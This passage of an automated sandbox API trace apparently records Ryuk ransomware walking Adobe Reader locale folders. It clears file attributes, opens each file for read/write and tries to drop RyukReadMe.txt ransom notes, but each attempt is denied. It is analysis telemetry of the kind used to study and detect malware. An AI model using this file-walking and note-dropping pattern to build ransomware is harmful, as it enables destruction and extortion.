10.0\\Reader\\Locale\\da_DK\\SaveAsRTF.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\saveasrtf.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.516] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.516] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.516] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Search.DAN", dwFileAttributes=0x80) returned 0 [0138.516] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Search.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\search.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.516] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.516] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.517] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\SendMail.DAN", dwFileAttributes=0x80) returned 0 [0138.517] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\SendMail.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\sendmail.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.517] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.517] SetLastError (dwErrCode=0x0) [0138.517] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.517] GetLastError () returned 0x5 [0138.517] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.517] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.517] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.517] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.517] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.518] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\DEXShare.asfx", dwFileAttributes=0x80) returned 0 [0138.518] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.518] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.518] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.519] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\Services.asfx", dwFileAttributes=0x80) returned 0 [0138.519] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.519] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.519] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0138.519] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.519] SetLastError (dwErrCode=0x0) [0138.519] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.519] GetLastError () returned 0x5 [0138.519] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.519] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.519] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.520] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Spelling.DAN", dwFileAttributes=0x80) returned 0 [0138.520] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Spelling.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\spelling.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.520] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.520] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.520] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.521] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\updater.DAN", dwFileAttributes=0x80) returned 0 [0138.521] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\updater.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\updater.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.521] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.521] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.521] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.522] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.522] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Weblink.DAN", dwFileAttributes=0x80) returned 0 [0138.522] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Weblink.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\weblink.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.522] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.522] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.522] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.522] SetLastError (dwErrCode=0x0) [0138.522] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.522] GetLastError () returned 0x5 [0138.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.522] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.522] SetLastError (dwErrCode=0x0) [0138.522] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.523] GetLastError () returned 0x5 [0138.523] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.523] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.524] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.524] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.524] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.525] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\accessibility.DEU", dwFileAttributes=0x80) returned 0 [0138.525] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\accessibility.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\accessibility.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.525] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.525] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.525] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.526] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Acroform.DEU", dwFileAttributes=0x80) returned 0 [0138.526] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Acroform.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\acroform.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.526] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.526] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.527] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.527] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\AdobeCollabSync.DEU", dwFileAttributes=0x80) returned 0 [0138.527] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\AdobeCollabSync.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\adobecollabsync.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.527] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.528] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.528] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.528] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Annots.DEU", dwFileAttributes=0x80) returned 0 [0138.528] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Annots.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\annots.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.529] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.529] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.529] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.529] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\BRdlang32.DEU", dwFileAttributes=0x80) returned 0 [0138.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\BRdlang32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\brdlang32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.530] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.530] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.530] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.530] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Checkers.DEU", dwFileAttributes=0x80) returned 0 [0138.530] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Checkers.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\checkers.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.531] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.531] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.531] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\DigSig.DEU", dwFileAttributes=0x80) returned 0 [0138.531] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\DigSig.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\digsig.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.531] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.531] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.532] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\DVA.DEU", dwFileAttributes=0x80) returned 0 [0138.532] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\DVA.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\dva.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.532] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.532] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.532] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\eBook.DEU", dwFileAttributes=0x80) returned 0 [0138.533] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\eBook.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ebook.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.533] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.533] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Escript.deu", dwFileAttributes=0x80) returned 0 [0138.533] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Escript.deu" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\escript.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.534] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.534] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.534] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.534] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\IA32.DEU", dwFileAttributes=0x80) returned 0 [0138.534] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\IA32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ia32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.534] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.535] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.535] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.535] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.535] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\makeaccessible.DEU", dwFileAttributes=0x80) returned 0 [0138.535] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\makeaccessible.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\makeaccessible.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.536] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.536] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.536] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.536] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.536] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Multimedia.DEU", dwFileAttributes=0x80) returned 0 [0138.536] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Multimedia.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\multimedia.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.536] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.536] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.536] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.536] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.536] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\pddom.DEU", dwFileAttributes=0x80) returned 0 [0138.537] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\pddom.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\pddom.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.537] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.537] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.537] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\PPKLITE.DEU", dwFileAttributes=0x80) returned 0 [0138.537] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\PPKLITE.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\ppklite.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.537] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.537] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.538] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\RdLang32.DEU", dwFileAttributes=0x80) returned 0 [0138.538] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\RdLang32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\rdlang32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 